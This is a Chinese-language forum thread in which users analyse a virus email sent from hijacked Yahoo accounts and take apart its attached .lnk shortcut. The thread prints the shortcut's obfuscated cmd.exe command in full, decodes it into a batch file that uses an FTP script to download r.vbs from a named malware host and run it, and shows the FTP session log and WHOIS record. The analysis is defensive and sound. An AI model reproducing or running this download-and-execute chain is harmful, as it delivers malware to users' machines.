每隔一段時間，就會收到不同朋友使用 Yahoo 信箱寄過來的病毒檔，將該病毒檔上傳到 VirusTotal 又檢查不出病毒...

請問透過 Yahoo 信箱所寄的病毒，是 User 使用中毒電腦登入 Yahoo 信箱，病毒才透過Yahoo 信箱寄信給通信錄名單嗎?

還是 Yahoo 信箱帳密被盜，被人假用名義寄信..

我將該病毒檔上傳到 VirusTotal 網站又檢測不出問題，真是怪異!

病毒信，信件內容如下:
########################################
給你看我在網路上的第11個老婆的相片


10.15:9


___________________________________________________
您的生活即時通 － 溝通、娛樂、生活、工作一次搞定！
http://messenger.yahoo.com.tw/
##############################################

所夾帶的附檔以上傳

贊助商連結

Yahoo帳號被盜用,才從Yahoo寄信出來
(不管是透過標準SMTP還是Yahoo Webmail)
那個是"一連串動作的捷徑"
並不是木馬本體
掃不出來,很正常

NIS 2010全殺
另外VT當然掃不出毒
因為他是做個捷徑到正常檔案

"3.5 KB" 頂多只是惡意網站連結

"3.5 KB" 頂多只是惡意網站連結
FYI兄有興趣可以玩玩這東西
你就把它當.BAT檔來看就行了
.BAT檔如果有2K,能做的事情就多到跟山一樣了...

FYI兄有興趣可以玩玩這東西
你就把它當.BAT檔來看就行了
.BAT檔如果有2K,能做的事情就多到跟山一樣了...
.BAT 沒這麼容易從郵件裡執行吧! 就小弟的研判, 首先郵件是HTML 格式, 然後夾帶一個附件, 以HTML 語法執行一個附加檔案, 這點不太可能, 因為檔案必須先儲存, 若在HTML 內容直接執行指令, 這點小弟就外行了

用猜的還不如直接打開來看, 果然是兩個 "小么.lnk"

.BAT 沒這麼容易從郵件裡執行吧! 就小弟的研判, 首先郵件是HTML 格式, 然後夾帶一個附件, 以HTML 語法執行一個附加檔案, 這點不太可能, 因為檔案必須先儲存, 若在HTML 內容直接執行指令, 這點小弟就外行了

用猜的還不如直接打開來看, 果然是兩個 "小么.lnk"
是沒那麼容易執行啊
因為都要使用者自己笨笨的點下去啊 :fd:
既然都點下去了,當然就愛怎麼搞就怎麼搞

我不知道在大多數人的環境下,看不看得到那個副檔名??
(沒在用Outlook express,也很少用Webmail...)

PS:其實應該要問,他們到底在不在意中木馬?

請問那個 *.lnk 病毒的內容的目標欄位應該是指令，這些指令為何好像都被編碼?
請問如何將他還原為一般的指令?

%coMsPeC% /C set M=p -s:j&SeT N=.&sET y=G03&sET v=33&SeT e=echO &EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B&EChO %E%AA%v%^>^>j>>B&ecHO %E%bb%v%^>^>j>>B&echo %e%rECV r r.Vbs^>^>J>>B&ECho %E%bY^>^>J>>b&ECho Ft%M%>>b&EchO STaRT r.VBs>>b&reN b u.BAT&CaLl U.Bat&

請問那個 *.lnk 病毒的內容的目標欄位應該是指令，這些指令為何好像都被編碼?
請問如何將他還原為一般的指令?

%coMsPeC% /C set M=p -s:j&SeT N=.&sET y=G03&sET v=33&SeT e=echO &EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B&EChO %E%AA%v%^>^>j>>B&ecHO %E%bb%v%^>^>j>>B&echo %e%rECV r r.Vbs^>^>J>>B&ECho %E%bY^>^>J>>b&ECho Ft%M%>>b&EchO STaRT r.VBs>>b&reN b u.BAT&CaLl U.Bat&
抱歉! 小弟直到現在才明白tvirus 兄的意思, %COMSPEC%, START r.VBS, Call U.BAT, 原來.lnk 只是障眼法, 針對的還是Windows 的漏洞, 可否請樓主貼出完整信件的原始內容?

抱歉! 小弟直到現在才明白tvirus 兄的意思, %COMSPEC%, START r.VBS, Call U.BAT, 原來.lnk 只是障眼法, 針對的還是Windows 的漏洞, 可否請樓主貼出完整信件的原始內容?
透過Prcview去看看這LNK做了啥事...
1.
"C:\WINDOWS\system32\cmd.exe" /C set M=p -s:j&SeT N=.&sET y=G03&sET v=33&SeT e=echO &EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B&EChO %E%AA%v%^>^>j>>B&ecHO %E%bb%v%^>^>j>>B&echo %e%rECV r r.Vbs^>^>J>>B&ECho %E%bY^>^>J>>b&ECho Ft%M%>>b&EchO STaRT r.VBs>>b&reN b u.BAT&CaLl U.Bat&
2.
Ftp -s:j


先將1的部份以&來斷行
"C:\WINDOWS\system32\cmd.exe" /C set M=p -s:j
SeT N=.
sET y=G03
sET v=33
SeT e=echO
EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B
EChO %E%AA%v%^>^>j>>B
ecHO %E%bb%v%^>^>j>>B
echo %e%rECV r r.Vbs^>^>J>>B
ECho %E%bY^>^>J>>b
ECho Ft%M%>>b
EchO STaRT r.VBs>>b
reN b u.BAT
CaLl U.Bat&

因為開始目錄為%windir%
所以在C:\WINDOWS產生了u.bat及J
C:\WINDOWS>type u.bat
%e%o WWw%n%%y%Z%N%CoM>J
%E%AA%v%>>j
%E%bb%v%>>j
%e%rECV r r.Vbs>>J
%E%bY>>J
Ft%M%
STaRT r.VBs

C:\WINDOWS>type j
o www . g03z . com
AA33
bb33
rECV r r.Vbs
bY

所以...目地是用ftp指令,代入script檔案J連到www . g03z . com
帳號密碼輸入後,抓r.vbs回來,然後下指令by斷線
過程:
C:\WINDOWS>ftp www . g03z . com
Connected to www . g03z . com.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (www . g03z . com:(none)): AA33
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> rECV r r.Vbs
200 PORT Command successful.
150 Opening ASCII mode data connection for r (1327 Bytes).
226-Maximum disk quota limited to 102400 kBytes
Used disk quota 0 kBytes, available 102400 kBytes
226 Transfer complete.
ftp: 1327 bytes received in 0.01Seconds 88.47Kbytes/sec.
ftp> by
221 Goodbye!
====================================================
然後u.bat最後再start r.vbs

至於那個r.vbs內容是啥...呃...交給你們了...

睡覺前最後PS:
那個g03z,好像是有名的放毒站...
最糟糕的是
主機它在台灣 :Q
http://www.db.ripe.net/whois?form_type=advanced&full_query_string=&searchtext=202.153.172.43&do_search=Search&inverse_attributes=None&ip_search_lvl=Default%28nearest+match%29&alt_database=ALL&object_type=All

Domain Name : g03z.com
PunnyCode : g03z.com
Creation Date : 2009-01-08 16:50:39
Updated Date : 2009-01-08 16:50:39
Expiration Date : 2010-01-08 16:50:21

Registrant:
Organization : ggg zzz
Name : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234

Administrative Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86--02586883333
Fax : 86--02586883333
Email : [email protected]

Technical Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86--02586883333
Fax : 86--02586883333
Email : [email protected]

Billing Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86--02586883333
Fax : 86--02586883333
Email : [email protected]

Registry Status: ok